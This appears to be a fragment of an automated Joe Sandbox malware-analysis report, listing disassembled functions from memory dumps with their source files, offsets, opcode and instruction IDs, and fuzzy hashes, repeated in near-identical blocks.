                          • Source File: 00000000.00000002.1798836116.000000000030A000.00000040.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                          • Associated: 00000000.00000002.1796925932.0000000000020000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1797151165.0000000000021000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1797151165.000000000004C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1797151165.000000000015D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1797151165.0000000000169000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1797151165.000000000018E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1797151165.00000000002F6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.0000000000492000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.0000000000575000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.0000000000598000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.00000000005A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.00000000005B0000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1799449155.00000000005B1000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1799647636.0000000000751000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1799712015.0000000000752000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_20000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: &1Z<
                          • API String ID: 0-4002375936
                          • Opcode ID: f6bcb2d2dae56a996347517fb4253cca9e259321aee50e1f1148be0f4f15e218
                          • Instruction ID: 48466536560f07b3266ef859ac19e95d6784c8c3057b4c6f6ceb5889e5ab6574
                          • Opcode Fuzzy Hash: f6bcb2d2dae56a996347517fb4253cca9e259321aee50e1f1148be0f4f15e218
                          • Instruction Fuzzy Hash: 46519CF3A083185BE308692DEC9477BB7D5DB80320F1B463DDF8693784EC796905868A
                          Function 0042C7A9 Relevance: 1.4, Strings: 1, Instructions: 194COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1798836116.000000000030A000.00000040.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                          • Associated: 00000000.00000002.1796925932.0000000000020000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1797151165.0000000000021000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1797151165.000000000004C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1797151165.000000000015D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1797151165.0000000000169000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1797151165.000000000018E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1797151165.00000000002F6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.0000000000492000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.0000000000575000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.0000000000598000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.00000000005A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.00000000005B0000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1799449155.00000000005B1000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1799647636.0000000000751000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1799712015.0000000000752000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_20000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: !E~
                          • API String ID: 0-1273611396
                          • Opcode ID: 187d6d5efd185ed1f46f89004a507a35aeb8cd031ffa5429e911260ab35872c2
                          • Instruction ID: 76554ec8ff3b0ac18b5da77a9a47537adf4182194065ccd0d6eaff48a0ca5b5c
                          • Opcode Fuzzy Hash: 187d6d5efd185ed1f46f89004a507a35aeb8cd031ffa5429e911260ab35872c2
                          • Instruction Fuzzy Hash: FF51E6F3A082009FF708AA2DDC4577AB7E6EF94321F1A853CDAC583784E63998154786
                          Function 003A3621 Relevance: 1.4, Strings: 1, Instructions: 121COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1798836116.000000000030A000.00000040.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                          • Associated: 00000000.00000002.1796925932.0000000000020000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1797151165.0000000000021000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1797151165.000000000004C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1797151165.000000000015D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1797151165.0000000000169000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1797151165.000000000018E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1797151165.00000000002F6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.0000000000492000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.0000000000575000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.0000000000598000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.00000000005A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.00000000005B0000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1799449155.00000000005B1000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1799647636.0000000000751000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1799712015.0000000000752000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_20000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: Yqqm
                          • API String ID: 0-3344287745
                          • Opcode ID: 3bf908d5df8aabe1c88bdecb8d1faac82c5ff1961a88811467e0f0eff87045f2
                          • Instruction ID: 8ba4b7e61bceb322600c5a5ebfd8bf9f6a6a50298b7063be6b76711642e8bedc
                          • Opcode Fuzzy Hash: 3bf908d5df8aabe1c88bdecb8d1faac82c5ff1961a88811467e0f0eff87045f2
                          • Instruction Fuzzy Hash: D03137B3A0C3195BF3046E3EEC54B77B7CAEBD0720F16823EEA4993340E87659054151
                          Function 0004E544 Relevance: .8, Instructions: 823COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000000.00000002.1797151165.000000000004C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                          • Associated: 00000000.00000002.1796925932.0000000000020000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1797151165.0000000000021000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1797151165.000000000015D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1797151165.0000000000169000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1797151165.000000000018E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1797151165.00000000002F6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.000000000030A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.0000000000492000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.0000000000575000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.0000000000598000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.00000000005A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.00000000005B0000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1799449155.00000000005B1000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1799647636.0000000000751000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1799712015.0000000000752000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_20000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: e82fb53e6e33c1c46d6227b86d57e629e491dcb0a26417ee9a3c8d3f310dc386
                          • Instruction ID: 18852ff06ec6086096f2dcfd8c14221eae59529ea4370ec906d4187715f73fe1
                          • Opcode Fuzzy Hash: e82fb53e6e33c1c46d6227b86d57e629e491dcb0a26417ee9a3c8d3f310dc386
                          • Instruction Fuzzy Hash: F782E2B5900F458FD765CF29C880BA2B7F1BF99300F548A2ED9EA87652DB30B545CB50
                          Function 00068E78 Relevance: .6, Instructions: 649COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000000.00000002.1797151165.000000000004C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                          • Associated: 00000000.00000002.1796925932.0000000000020000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1797151165.0000000000021000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1797151165.000000000015D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1797151165.0000000000169000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1797151165.000000000018E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1797151165.00000000002F6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.000000000030A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.0000000000492000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.0000000000575000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.0000000000598000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.00000000005A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.00000000005B0000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1799449155.00000000005B1000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1799647636.0000000000751000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1799712015.0000000000752000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_20000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: b14a04dd6bdce6d3c84cf2c82878dd7ecb710331ddf643e538226ead79392ace
                          • Instruction ID: 2f280e51b16edb4a67f77e73070998a99451e100746b639b0fe74f1b9b6657ec
                          • Opcode Fuzzy Hash: b14a04dd6bdce6d3c84cf2c82878dd7ecb710331ddf643e538226ead79392ace
                          • Instruction Fuzzy Hash: 4A42AD706047418FD735CF19C094665BBEBBF8A314F288A6ED48B8BB92D635E885CB50
                          Function 0009AC28 Relevance: .5, Instructions: 501COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000000.00000002.1797151165.000000000004C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                          • Associated: 00000000.00000002.1796925932.0000000000020000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1797151165.0000000000021000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1797151165.000000000015D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1797151165.0000000000169000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1797151165.000000000018E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1797151165.00000000002F6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.000000000030A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.0000000000492000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.0000000000575000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.0000000000598000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.00000000005A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.00000000005B0000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1799449155.00000000005B1000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1799647636.0000000000751000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1799712015.0000000000752000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_20000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 33a3ecce9cf6c937e2f0c1d2d9b4c4764a8803e2c9e6f8b29af544e94c312f39
                          • Instruction ID: 3cce29f18eecfa47b4f4eea48043ed4baad9b4b0d4a973edde2bc15cece504dd
                          • Opcode Fuzzy Hash: 33a3ecce9cf6c937e2f0c1d2d9b4c4764a8803e2c9e6f8b29af544e94c312f39
                          • Instruction Fuzzy Hash: 2B02F571E0421A8FCF11CF68C8906AFB7E2AFDA354F16832AE815B7251D770AD4197D0
                          Function 000798B8 Relevance: .5, Instructions: 482COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000000.00000002.1797151165.000000000004C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                          • Associated: 00000000.00000002.1796925932.0000000000020000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1797151165.0000000000021000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1797151165.000000000015D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1797151165.0000000000169000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1797151165.000000000018E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1797151165.00000000002F6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.000000000030A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.0000000000492000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.0000000000575000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.0000000000598000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.00000000005A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.00000000005B0000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1799449155.00000000005B1000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1799647636.0000000000751000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1799712015.0000000000752000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_20000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 2ec5425ea166261dbb47060f071532c3a8487158838a74badd6abe20aeed5f87
                          • Instruction ID: b7d7aa157fc7476c65eb5ec50ed0f00ffc656dbe55e48a52108c392765595fce
                          • Opcode Fuzzy Hash: 2ec5425ea166261dbb47060f071532c3a8487158838a74badd6abe20aeed5f87
                          • Instruction Fuzzy Hash: 8B02EF70E097058FDB25CF29C880269B7E2EFA5310F14C72DE99997362D739EC858B49
                          Function 000666C8 Relevance: .4, Instructions: 418COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000000.00000002.1797151165.000000000004C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                          • Associated: 00000000.00000002.1796925932.0000000000020000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1797151165.0000000000021000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1797151165.000000000015D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1797151165.0000000000169000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1797151165.000000000018E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1797151165.00000000002F6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.000000000030A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.0000000000492000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.0000000000575000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.0000000000598000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.00000000005A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.00000000005B0000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1799449155.00000000005B1000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1799647636.0000000000751000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1799712015.0000000000752000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_20000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: b8d9d4345e8cdc0c09525c5bce3898901bb43f275b80ce7cbd30b98cf4a35ec9
                          • Instruction ID: 86fe0e7d12e54aeb6c0eb2b57a9d1959f474d0c81b750dd56c815c7c0b6dcd25
                          • Opcode Fuzzy Hash: b8d9d4345e8cdc0c09525c5bce3898901bb43f275b80ce7cbd30b98cf4a35ec9
                          • Instruction Fuzzy Hash: 5FF159B260C6D14BC71D9A1484B08BD7FD35BAA201F0E86ADFDD60F393DA24DA05DB61
                          Function 000AB308 Relevance: .4, Instructions: 415COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000000.00000002.1797151165.000000000004C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                          • Associated: 00000000.00000002.1796925932.0000000000020000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1797151165.0000000000021000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1797151165.000000000015D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1797151165.0000000000169000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1797151165.000000000018E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1797151165.00000000002F6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.000000000030A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.0000000000492000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.0000000000575000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.0000000000598000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.00000000005A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.00000000005B0000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1799449155.00000000005B1000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1799647636.0000000000751000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1799712015.0000000000752000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_20000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 57d5d0b81d74e29e3200a1e995e817443f7765a17d79ee01e02cba8c1ad760b9
                          • Instruction ID: d3d7bff414cda61211ea64c6bf1877e17aa5b604120a716c9e2bdb1b10f347b7
                          • Opcode Fuzzy Hash: 57d5d0b81d74e29e3200a1e995e817443f7765a17d79ee01e02cba8c1ad760b9
                          • Instruction Fuzzy Hash: 57D17573F10A254BEB48CE99DC913ADB6E2EBD8350F19813ED916F7381D6B89D018790
                          Function 00090B88 Relevance: .4, Instructions: 378COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000000.00000002.1797151165.000000000004C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                          • Associated: 00000000.00000002.1796925932.0000000000020000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1797151165.0000000000021000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1797151165.000000000015D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1797151165.0000000000169000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1797151165.000000000018E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1797151165.00000000002F6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.000000000030A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.0000000000492000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.0000000000575000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.0000000000598000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.00000000005A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.00000000005B0000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1799449155.00000000005B1000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1799647636.0000000000751000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1799712015.0000000000752000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_20000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 8086af1eee23c2ec03667c4df963516334ec34816eb8b1db30eae6a2209b88cb
                          • Instruction ID: 9dee2c75bca28590e9d4aeb24ad526a38079241fcd8f5ffd60247531793ba4e8
                          • Opcode Fuzzy Hash: 8086af1eee23c2ec03667c4df963516334ec34816eb8b1db30eae6a2209b88cb
                          • Instruction Fuzzy Hash: 22D1F372E006198FDF648F98C8947EEB7F2BF89310F148239E915B7291D7345A46DB50
                          Function 0007B8A8 Relevance: .4, Instructions: 376COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000000.00000002.1797151165.000000000004C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                          • Associated: 00000000.00000002.1796925932.0000000000020000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1797151165.0000000000021000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1797151165.000000000015D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1797151165.0000000000169000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1797151165.000000000018E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1797151165.00000000002F6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.000000000030A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.0000000000492000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.0000000000575000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.0000000000598000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.00000000005A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.00000000005B0000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1799449155.00000000005B1000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1799647636.0000000000751000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1799712015.0000000000752000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_20000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 785eda4873c2745347b995e3ca024bc6e41954b75693d86a30469ec7c1fde165
                          • Instruction ID: 68f3a85eb93246a44ab6d7eb75a23d55b58561eebb48e22ece70158358ea0c19
                          • Opcode Fuzzy Hash: 785eda4873c2745347b995e3ca024bc6e41954b75693d86a30469ec7c1fde165
                          • Instruction Fuzzy Hash: CC027974E006588FCF26CFA8C4906EDBBF6FF89310F548159E8896B355D734AA91CB50
                          Function 0007BD68 Relevance: .4, Instructions: 372COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000000.00000002.1797151165.000000000004C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                          • Associated: 00000000.00000002.1796925932.0000000000020000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1797151165.0000000000021000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1797151165.000000000015D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1797151165.0000000000169000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1797151165.000000000018E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1797151165.00000000002F6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.000000000030A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.0000000000492000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.0000000000575000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.0000000000598000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.00000000005A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.00000000005B0000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1799449155.00000000005B1000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1799647636.0000000000751000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1799712015.0000000000752000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_20000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: b3095706403d8b2753a0f449caab4ca3cbf951e9973f819c05ee5ac836afa2e6
                          • Instruction ID: 128d215a0a37b4351e4f0563ffd83e3ad31ef5456278b2e62bec347eace3e19d
                          • Opcode Fuzzy Hash: b3095706403d8b2753a0f449caab4ca3cbf951e9973f819c05ee5ac836afa2e6
                          • Instruction Fuzzy Hash: 9C020075E006198FCF25CF98C4809ADB7B6FF88350F65816DE80AAB351D731AA91CF94
                          Function 0009A648 Relevance: .3, Instructions: 339COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000000.00000002.1797151165.000000000004C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
